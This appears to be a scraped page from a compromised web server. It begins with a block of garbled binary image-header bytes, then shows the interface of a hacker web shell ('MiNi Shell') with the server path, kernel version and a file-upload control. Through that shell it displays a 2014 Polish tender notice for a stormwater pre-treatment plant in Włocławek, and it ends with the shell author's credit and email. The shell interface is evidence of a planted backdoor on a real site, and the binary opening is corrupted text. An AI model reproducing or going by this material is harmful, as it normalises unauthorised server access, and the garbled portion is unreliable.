JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140826/283424-N-2014.html

<p class="kh_header"><b>Włocławek: Budowa podczyszczalni wód opadowych i roztopowych nr 4 w ramach zadania inwestycyjnego pn. Przebudowa drogi krajowej nr 1 w granicach administracyjnych miasta Włocławek - etap II</b><br>
<b>Numer ogłoszenia: 283424 - 2014; data zamieszczenia: 26.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Zielna 13/21, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121323, faks 054 4121323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdwloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa podczyszczalni wód opadowych i roztopowych nr 4 w ramach zadania inwestycyjnego pn. Przebudowa drogi krajowej nr 1 w granicach administracyjnych miasta Włocławek - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie podczyszczalni wód opadowych i roztopowych nr 4 w ramach zadania inwestycyjnego pn. Przebudowa drogi krajowej nr 1 w granicach administracyjnych miasta Włocławek - etap II
1. Zamówienie obejmuje:
- wykonanie robót budowlanych obejmujących: roboty ziemne (w tym wykonanie podłoża z materiałów sypkich - spełniających wymagania określone w STWiORB- pod posadowienie kanałów i obiektów), roboty branży kanalizacyjnej obejmujące posadowienie rurociągów i urządzeń podczyszczalni (studni, piaskownika, separatora i wykonania kanalizacji deszczowej DN 300), roboty towarzyszące (w tym zabezpieczenie wykopów i w razie konieczności doraźne pompowanie wody z wykopu pompami) oraz  roboty odtworzeniowe (odtworzenie nawierzchni, zieleńców, ogrodzeń), 
- sporządzenie dokumentacji powykonawczej,
- sporządzenie projektów tymczasowej organizacji ruchu drogowego.

Szczegółowy opis przedmiotu zamówienia, a w tym parametry i zakres prac, określone zostały Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych oraz w dokumentacji budowlanej - załącznik nr 9 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.25.56.00-5, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 65.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1. Wykonawca winien w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonać jedną robotę budowlaną odpowiadającą rodzajem robotom budowlanym stanowiącym przedmiot niniejszego zamówienia polegającą na - budowie, przebudowie sieci kanalizacji deszczowej lub sanitarnej o wartości nie mniejszej niż 100 000 PLN  brutto,
2.2. W celu oceny spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 i zweryfikowania zdolności wykonawcy do należytego wykonania udzielonego zamówienia 
w opisie jak powyżej, należy załączyć:
a) wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz 
z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz
b) z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone, zgodnie z pkt IV.I.2.1. siwz oraz zgodnie z treścią zał. nr 5 do siwz;
Przez najważniejsze roboty wraz z dowodami Zamawiający rozumie roboty, o których mowa 
w pkt 2.1. to jest roboty polegające na - budowie, przebudowie sieci kanalizacji deszczowej lub sanitarnej o wartości nie mniejszej niż 100 000 PLN  brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.2.1. Wykonawca winien wykazać się osobami oraz informacjami o podstawie do dysponowania tymi osobami, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za kierowanie robotami budowlanymi (zgodnie z dyspozycją art. 12 ustawy - Prawo Budowlane - t.j. Dz. U. z 2013 r. poz. 1409 ze zm.), minimum 1 osobę do obsadzenia stanowiska:
Kierownika robót branży sanitarnej posiadającego uprawnienia do kierowania robotami budowlanymi bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.
3.2.2. W celu oceny spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 
i zweryfikowania zdolności wykonawcy do należytego wykonania udzielonego zamówienia 
w opisie jak powyżej, należy załączyć:
a) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z pkt IV.I.3.2.1 siwz oraz zgodnie z treścią zał. nr 6 do siwz;
oraz
b) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie z pkt IV.I.3.2.1 siwz.
3.2.3. Spełnienie warunku o którym mowa w pkt IV.I.3.2.1 nie zwalnia wyłonionego Wykonawcy 
z obowiązku zapewnienia innych osób niezbędnych do prawidłowej i terminowej realizacji zamówienia.
3.2.4. Zamawiający dopuszcza także możliwość potwierdzenia spełniania warunku dotyczącego dysponowania odpowiednimi osobami poprzez wykazanie posiadania przez nie uprawnień równoważnych do wymaganych, wydanych na podstawie przepisów obowiązujących w państwach członkowskich i potwierdzonych stosowną decyzją w sprawie uznania kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z odrębnych dokumentów np. odpisu z rejestru.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie postanowienia, które zostaną wprowadzone do treści umowy, wymagania dotyczące umów o podwykonawstwo, których przedmiotem są roboty budowlane, dostawy lub usługi oraz wysokość kar umownych z tytułu niewykonania lub nienależytego wykonania umowy zawarte są we wzorze umowy stanowiącym załącznik do niniejszej specyfikacji istotnych warunków.
2. Zamawiający dopuszcza jednak możliwość wprowadzania zmian w umowie w stosunku do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
2.1. w przypadku konieczności przeprowadzenia przez Zamawiającego postępowań w trybie ustawy prawo zamówień publicznych lub w trybie art. 4 ust 8 ustawy prawo zamówień publicznych na realizację robót nieobjętych przedmiotem zamówienia, koniecznych dla realizacji zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia realizacji inwestycji, (powodujących konieczność jego wydłużenia), przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwać będzie niemożliwość wykonywania jakichkolwiek robót.
2.2. przedłużenie terminu zakończenia przedmiotu umowy może nastąpić także w przypadkach:
2.2.1	wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej,
2.2.2	wydania zakazu prowadzenia prac przez organ administracji publicznej o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,
2.2.3	wystąpienia kolizji z podziemnymi sieciami/urządzeniami dla której celem rozwiązania niezbędne jest opracowanie projektu zamiennego, jeśli spowoduje to wstrzymanie robót na okres dłuższy niż 5 dni kalendarzowych, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie,
2.2.4	w przypadku wystąpienia kolizji z naziemnymi lub podziemnymi sieciami/urządzeniami, nieprzewidzianych w dokumentacji projektowej, których usunięcie będzie miało wpływ na umowny termin realizacji zadania, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwać będą roboty budowlane związane z usunięciem tych kolizji,
2.2.5	wystąpienia potrzeby uzyskania zmiany pozwolenia na budowę w wyniku wprowadzenia koniecznych, istotnych zmian w projekcie budowlanym, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie, bądź też o tyle dni ile trwała konieczność uzyskiwania zmiany pozwolenia na budowę,
2.2.6	konieczności wykonania robót zamiennych, związanych z koniecznością dokonania zmian projektowych bądź zmiany technologii (do których wykonania wystarczy zgoda zamawiającego i projektanta):
2.2.6.1. roboty zamienne polegają na tym, że wykonawca zobowiązuje się do wykonania  zamówienia podstawowego w sposób odmienny od określonego w umowie;
2.2.6.2. roboty zamienne nie powodują zwiększenia (zmiany) zakresu świadczenia wykonawcy zawartego w ofercie;
2.2.6.3. roboty zamienne nie mogą spowodować zwiększenia wynagrodzenia wykonawcy
2.2.6.4. konieczność wykonania robót zamiennych zachodzi w sytuacji, gdy:
a) materiały budowlane przewidziane w umowie do wykonania zamówienia nie mogą być  użyte przy realizacji inwestycji z powodu zaprzestania produkcji lub zastąpienia innymi;
b) w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa budowlanego;
c) w czasie realizacji budowy zmienią się warunki techniczne wykonania (np. Norma);
d) w trakcie realizacji zamówienia zastosowano lepsze materiały budowlane bądź inną  technologię wykonania robót.
2.3.7.wystąpienia niekorzystnych warunków atmosferycznych (np. opady atmosferyczne, temperatury ujemne, podwyższenie stanu wód gruntowych) uniemożliwiających zastosowanie technologii przewidzianej w dokumentacji budowlanej, jeśli spowoduje to wstrzymanie wszystkich robót przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie.
2.3 możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego dotyczących zmiany w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy.
a) roboty zamienne polegają na tym, że wykonawca zobowiązuje się do wykonania  zamówienia podstawowego w sposób odmienny od określonego w umowie;
b) roboty zamienne nie powodują zwiększenia (zmiany) zakresu świadczenia wykonawcy zawartego w ofercie;
c) roboty zamienne nie mogą spowodować zwiększenia wynagrodzenia wykonawcy
2.4 możliwość wprowadzenia lub/i zastosowania innej technologii wykonania robót.
2.5 możliwość zmiany wynagrodzenia na skutek niewykonania pełnego zakresu robót (roboty zaniechane) poprzez zmniejszenie tego wynagrodzenia o równowartość robót zaniechanych, ustalonych na podstawie podpisanego przez strony protokołu robót zaniechanych, w oparciu o ceny wskazane przez Wykonawcę w kosztorysie ofertowym;
2.6 możliwość zmiany osób pełniących funkcję kierownika budowy/kierowników robót 
w trakcie trwania umowy. Zmiana osób może nastąpić jedynie:
a) gdy kwalifikacje tych osób będą takie same lub wyższe od kwalifikacji osób wymaganych postanowieniami Specyfikacji Istotnych Warunków Zamówienia,
b) po złożeniu przez wyznaczone przez Wykonawcę oraz zaakceptowane przez Zamawiającego osoby pisemnego oświadczenia o przejęciu obowiązków kierownika budowy/kierownika robót, wynikających z art. 22  ustawy Prawo Budowlane, z podaniem dnia przejęcia obowiązków.
2.7 zmiany zakresu robót zgłoszonych do podwykonawstwa oraz zmiany podwykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego,
2.8 Zmiana podwykonawcy, który zgodnie z art. 26 ust. 2b ustawy pzp będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku Wykonawca zobowiązany jest zaproponować innego podwykonawcę spełniającego (na dzień składania ofert) warunki określone przez Zamawiającego w SIWZ, wraz 
z załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych w IV.I siwz, w zakresie którego dotyczą.
2.9 zmiany przepisów prawa mające wpływ na postanowienia umowne.
3. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej 
i podpisania przez obie strony.
4. Wszelkie zmiany do umowy mogą być wprowadzone w okolicznościach i na zasadach  jak powyżej wyłącznie przed zakończeniem terminu realizacji umowy.
5. Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak
i Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. mzdwloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2014 godzina 10:00, miejsce: Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie pn. Przebudowa drogi krajowej nr 1 POIiŚ jest współfinansowane z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com